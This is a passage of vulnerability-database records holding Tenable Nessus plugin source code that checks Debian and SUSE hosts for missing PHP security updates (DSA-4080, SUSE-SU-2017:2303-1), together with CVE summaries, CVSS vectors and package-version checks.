prefix:\"php5\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-cgi\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-cli\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-common\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-curl\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-dbg\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-dev\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-enchant\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-fpm\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-gd\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-gmp\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-imap\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-interbase\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-intl\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-ldap\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-mcrypt\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-mysql\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-mysqlnd\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-odbc\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-pgsql\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-phpdbg\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-pspell\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-readline\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-recode\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-snmp\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-sqlite\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-sybase\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-tidy\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-xmlrpc\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-xsl\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:20", "description": "Several vulnerabilities were found in PHP, a widely-used open source general purpose scripting language :\n\n - CVE-2017-11144 Denial of service in openssl extension due to incorrect return value check of OpenSSL sealing function\n\n - CVE-2017-11145 Out-of-bounds read in wddx_deserialize()\n\n - CVE-2017-11628 Buffer overflow in PHP INI parsing API\n\n - CVE-2017-12932 / CVE-2017-12934 Use-after-frees during unserialisation\n\n - CVE-2017-12933 Buffer overread in finish_nested_data()\n\n - CVE-2017-16642 Out-of-bounds read in timelib_meridian()", "cvss3": {}, "published": "2018-01-09T00:00:00", "type": "nessus", "title": "Debian DSA-4080-1 : php7.0 - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11628", "CVE-2017-12932", "CVE-2017-12933", "CVE-2017-12934", "CVE-2017-16642"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:php7.0", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4080.NASL", "href": "https://www.tenable.com/plugins/nessus/105663", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4080. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105663);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/04/05 23:25:05\");\n\n script_cve_id(\"CVE-2017-11144\", \"CVE-2017-11145\", \"CVE-2017-11628\", \"CVE-2017-12932\", \"CVE-2017-12933\", \"CVE-2017-12934\", \"CVE-2017-16642\");\n script_xref(name:\"DSA\", value:\"4080\");\n\n script_name(english:\"Debian DSA-4080-1 : php7.0 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were found in PHP, a widely-used open source\ngeneral purpose scripting language :\n\n - CVE-2017-11144\n Denial of service in openssl extension due to incorrect\n return value check of OpenSSL sealing function\n\n - CVE-2017-11145\n Out-of-bounds read in wddx_deserialize()\n\n - CVE-2017-11628\n Buffer overflow in PHP INI parsing API\n\n - CVE-2017-12932 / CVE-2017-12934\n Use-after-frees during unserialisation\n\n - CVE-2017-12933\n Buffer overread in finish_nested_data()\n\n - CVE-2017-16642\n Out-of-bounds read in timelib_meridian()\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-11144\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-11145\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-11628\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-12932\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-12934\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-12933\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-16642\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/php7.0\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/php7.0\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4080\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the php7.0 packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 7.0.27-0+deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"libapache2-mod-php7.0\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libphp7.0-embed\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-bcmath\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-bz2\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-cgi\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-cli\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-common\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-curl\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-dba\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-dev\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-enchant\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-fpm\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-gd\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-gmp\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-imap\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-interbase\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-intl\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-json\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-ldap\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-mbstring\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-mcrypt\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-mysql\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-odbc\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-opcache\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-pgsql\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-phpdbg\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-pspell\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-readline\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-recode\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-snmp\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-soap\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-sqlite3\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-sybase\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-tidy\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-xml\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-xmlrpc\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-xsl\", reference:\"7.0.27-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"php7.0-zip\", reference:\"7.0.27-0+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:25:10", "description": "This update for php7 fixes the following issues :\n\n - CVE-2016-10397: parse_url() can be bypassed to return fake host. (bsc#1047454)\n\n - CVE-2017-11142: Remoteattackers could cause a CPU consumption denial of service attack by injectinglong form variables, related to main/php_variables.\n (bsc#1048100)\n\n - CVE-2017-11144: The opensslextension PEM sealing code did not check the return value of the OpenSSL sealingfunction, which could lead to a crash.\n (bsc#1048096)\n\n - CVE-2017-11145: Lack of bounds checks in timelib_meridian coud lead to information leak.\n (bsc#1048112)\n\n - CVE-2017-11146: Lack of bounds checks in timelib_meridian parse code could lead to information leak. (bsc#1048111)\n\n - CVE-2017-11147: The PHAR archive handler could beused by attackers supplying malicious archive files to crash the PHP interpreteror potentially disclose information.\n (bsc#1048094)\n\n - CVE-2017-11628: Stack-base dbuffer overflow in zend_ini_do_op() could lead to denial of service (bsc#1050726)\n\n - CVE-2017-7890: Buffer over-read from unitialized data in gdImageCreateFromGifCtx function could lead to denial of service (bsc#1050241)\n\n - CVE-2016-5766: Integer Overflow in _gd2GetHeader() resulting in heap overflow could lead to denial of service or code execution (bsc#986386) Other fixes :\n\n - Soap Request with References (bsc#1053645)\n\n - php7-pear should explicitly require php7-pear-Archive_Tar otherwise this dependency must be declared in every php7-pear-* package explicitly.\n [bnc#1052389]\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-01-02T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : php7 (SUSE-SU-2017:2303-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-10397", "CVE-2016-5766", "CVE-2017-11142", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11146", "CVE-2017-11147", "CVE-2017-11628", "CVE-2017-7890"], "modified": "2022-05-24T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:apache2-mod_php7", "p-cpe:/a:novell:suse_linux:apache2-mod_php7-debuginfo", "p-cpe:/a:novell:suse_linux:php7", "p-cpe:/a:novell:suse_linux:php7-bcmath", "p-cpe:/a:novell:suse_linux:php7-bcmath-debuginfo", "p-cpe:/a:novell:suse_linux:php7-bz2", "p-cpe:/a:novell:suse_linux:php7-bz2-debuginfo", "p-cpe:/a:novell:suse_linux:php7-calendar", "p-cpe:/a:novell:suse_linux:php7-calendar-debuginfo", "p-cpe:/a:novell:suse_linux:php7-ctype", "p-cpe:/a:novell:suse_linux:php7-ctype-debuginfo", "p-cpe:/a:novell:suse_linux:php7-curl", "p-cpe:/a:novell:suse_linux:php7-curl-debuginfo", "p-cpe:/a:novell:suse_linux:php7-dba", "p-cpe:/a:novell:suse_linux:php7-dba-debuginfo", "p-cpe:/a:novell:suse_linux:php7-debuginfo", "p-cpe:/a:novell:suse_linux:php7-debugsource", "p-cpe:/a:novell:suse_linux:php7-dom", "p-cpe:/a:novell:suse_linux:php7-dom-debuginfo", "p-cpe:/a:novell:suse_linux:php7-enchant", "p-cpe:/a:novell:suse_linux:php7-pcntl", "p-cpe:/a:novell:suse_linux:php7-pcntl-debuginfo", "p-cpe:/a:novell:suse_linux:php7-pdo", "p-cpe:/a:novell:suse_linux:php7-pdo-debuginfo", "p-cpe:/a:novell:suse_linux:php7-pgsql", "p-cpe:/a:novell:suse_linux:php7-pgsql-debuginfo", "p-cpe:/a:novell:suse_linux:php7-phar", "p-cpe:/a:novell:suse_linux:php7-phar-debuginfo", "p-cpe:/a:novell:suse_linux:php7-posix", "p-cpe:/a:novell:suse_linux:php7-posix-debuginfo", "p-cpe:/a:novell:suse_linux:php7-pspell", "p-cpe:/a:novell:suse_linux:php7-pspell-debuginfo", "p-cpe:/a:novell:suse_linux:php7-shmop", "p-cpe:/a:novell:suse_linux:php7-shmop-debuginfo", "p-cpe:/a:novell:suse_linux:php7-snmp", "p-cpe:/a:novell:suse_linux:php7-snmp-debuginfo", "p-cpe:/a:novell:suse_linux:php7-soap", "p-cpe:/a:novell:suse_linux:php7-soap-debuginfo", "p-cpe:/a:novell:suse_linux:php7-sockets", "p-cpe:/a:novell:suse_linux:php7-sockets-debuginfo", "p-cpe:/a:novell:suse_linux:php7-sqlite", "p-cpe:/a:novell:suse_linux:php7-sqlite-debuginfo", "p-cpe:/a:novell:suse_linux:php7-sysvmsg", "p-cpe:/a:novell:suse_linux:php7-sysvmsg-debuginfo", "p-cpe:/a:novell:suse_linux:php7-sysvsem", "p-cpe:/a:novell:suse_linux:php7-sysvsem-debuginfo", "p-cpe:/a:novell:suse_linux:php7-sysvshm", "p-cpe:/a:novell:suse_linux:php7-sysvshm-debuginfo", "p-cpe:/a:novell:suse_linux:php7-tokenizer", "p-cpe:/a:novell:suse_linux:php7-tokenizer-debuginfo", "p-cpe:/a:novell:suse_linux:php7-wddx", "p-cpe:/a:novell:suse_linux:php7-wddx-debuginfo", "p-cpe:/a:novell:suse_linux:php7-xmlreader", "p-cpe:/a:novell:suse_linux:php7-xmlreader-debuginfo", "p-cpe:/a:novell:suse_linux:php7-xmlrpc", "p-cpe:/a:novell:suse_linux:php7-xmlrpc-debuginfo", "p-cpe:/a:novell:suse_linux:php7-xmlwriter", "p-cpe:/a:novell:suse_linux:php7-xmlwriter-debuginfo", "p-cpe:/a:novell:suse_linux:php7-xsl", "p-cpe:/a:novell:suse_linux:php7-xsl-debuginfo", "p-cpe:/a:novell:suse_linux:php7-zip", "p-cpe:/a:novell:suse_linux:php7-zip-debuginfo", "p-cpe:/a:novell:suse_linux:php7-zlib", "p-cpe:/a:novell:suse_linux:php7-zlib-debuginfo", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:php7-ftp", "p-cpe:/a:novell:suse_linux:php7-ftp-debuginfo", "p-cpe:/a:novell:suse_linux:php7-gd", "p-cpe:/a:novell:suse_linux:php7-gd-debuginfo", "p-cpe:/a:novell:suse_linux:php7-gettext", "p-cpe:/a:novell:suse_linux:php7-gettext-debuginfo", "p-cpe:/a:novell:suse_linux:php7-gmp", "p-cpe:/a:novell:suse_linux:php7-gmp-debuginfo", "p-cpe:/a:novell:suse_linux:php7-iconv", "p-cpe:/a:novell:suse_linux:php7-iconv-debuginfo", "p-cpe:/a:novell:suse_linux:php7-imap", "p-cpe:/a:novell:suse_linux:php7-imap-debuginfo", "p-cpe:/a:novell:suse_linux:php7-intl", "p-cpe:/a:novell:suse_linux:php7-intl-debuginfo", "p-cpe:/a:novell:suse_linux:php7-json", "p-cpe:/a:novell:suse_linux:php7-json-debuginfo", "p-cpe:/a:novell:suse_linux:php7-ldap", "p-cpe:/a:novell:suse_linux:php7-ldap-debuginfo", "p-cpe:/a:novell:suse_linux:php7-mbstring", "p-cpe:/a:novell:suse_linux:php7-mbstring-debuginfo", "p-cpe:/a:novell:suse_linux:php7-mcrypt", "p-cpe:/a:novell:suse_linux:php7-mcrypt-debuginfo", "p-cpe:/a:novell:suse_linux:php7-mysql", "p-cpe:/a:novell:suse_linux:php7-mysql-debuginfo", "p-cpe:/a:novell:suse_linux:php7-odbc", "p-cpe:/a:novell:suse_linux:php7-odbc-debuginfo", "p-cpe:/a:novell:suse_linux:php7-opcache", "p-cpe:/a:novell:suse_linux:php7-opcache-debuginfo", "p-cpe:/a:novell:suse_linux:php7-openssl", "p-cpe:/a:novell:suse_linux:php7-openssl-debuginfo", "p-cpe:/a:novell:suse_linux:php7-enchant-debuginfo", "p-cpe:/a:novell:suse_linux:php7-exif", "p-cpe:/a:novell:suse_linux:php7-exif-debuginfo", "p-cpe:/a:novell:suse_linux:php7-fastcgi", "p-cpe:/a:novell:suse_linux:php7-fastcgi-debuginfo", "p-cpe:/a:novell:suse_linux:php7-fileinfo", "p-cpe:/a:novell:suse_linux:php7-fileinfo-debuginfo", "p-cpe:/a:novell:suse_linux:php7-fpm", "p-cpe:/a:novell:suse_linux:php7-fpm-debuginfo"], "id": "SUSE_SU-2017-2303-1.NASL", "href": "https://www.tenable.com/plugins/nessus/120003", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2303-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120003);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/24\");\n\n script_cve_id(\n \"CVE-2016-5766\",\n \"CVE-2016-10397\",\n \"CVE-2017-7890\",\n \"CVE-2017-11142\",\n \"CVE-2017-11144\",\n \"CVE-2017-11145\",\n \"CVE-2017-11146\",\n \"CVE-2017-11147\",\n \"CVE-2017-11628\"\n );\n\n script_name(english:\"SUSE SLES12 Security Update : php7 (SUSE-SU-2017:2303-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for php7 fixes the following issues :\n\n - CVE-2016-10397: parse_url() can be bypassed to return\n fake host. (bsc#1047454)\n\n - CVE-2017-11142: Remoteattackers could cause a CPU\n consumption denial of service attack by injectinglong\n form variables, related to main/php_variables.\n (bsc#1048100)\n\n - CVE-2017-11144: The opensslextension PEM sealing code\n did not check the return value of the OpenSSL\n sealingfunction, which could lead to a crash.\n (bsc#1048096)\n\n - CVE-2017-11145: Lack of bounds checks in\n timelib_meridian coud lead to information leak.\n (bsc#1048112)\n\n - CVE-2017-11146: Lack of bounds checks in\n timelib_meridian parse code could lead to information\n leak. (bsc#1048111)\n\n - CVE-2017-11147: The PHAR archive handler could beused by\n attackers supplying malicious archive files to crash the\n PHP interpreteror potentially disclose information.\n (bsc#1048094)\n\n - CVE-2017-11628: Stack-base dbuffer overflow in\n zend_ini_do_op() could lead to denial of service\n (bsc#1050726)\n\n - CVE-2017-7890: Buffer over-read from unitialized data in\n gdImageCreateFromGifCtx function could lead to denial of\n service (bsc#1050241)\n\n - CVE-2016-5766: Integer Overflow in _gd2GetHeader()\n resulting in heap overflow could lead to denial of\n service or code execution (bsc#986386) Other fixes :\n\n - Soap Request with References (bsc#1053645)\n\n - php7-pear should explicitly require\n php7-pear-Archive_Tar otherwise this dependency must be\n declared in every php7-pear-* package explicitly.\n [bnc#1052389]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047454\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048094\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048096\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048100\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048111\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048112\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050241\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050726\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052389\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053645\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=986386\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-10397/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-5766/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-11142/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-11144/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-11145/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-11146/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-11147/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-11628/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-7890/\");\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172303-1/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9326f566\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2017-1417=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-1417=1\n\nSUSE Linux Enterprise Module for Web Scripting 12:zypper in -t patch\nSUSE-SLE-Module-Web-Scripting-12-2017-1417=1\n\nTo bring your system up-to-date, use 'zypper patch'.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11628\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2017-11147\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php7-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php7-ctype\");\n script_set_attribute(attribute:\"cpe\", 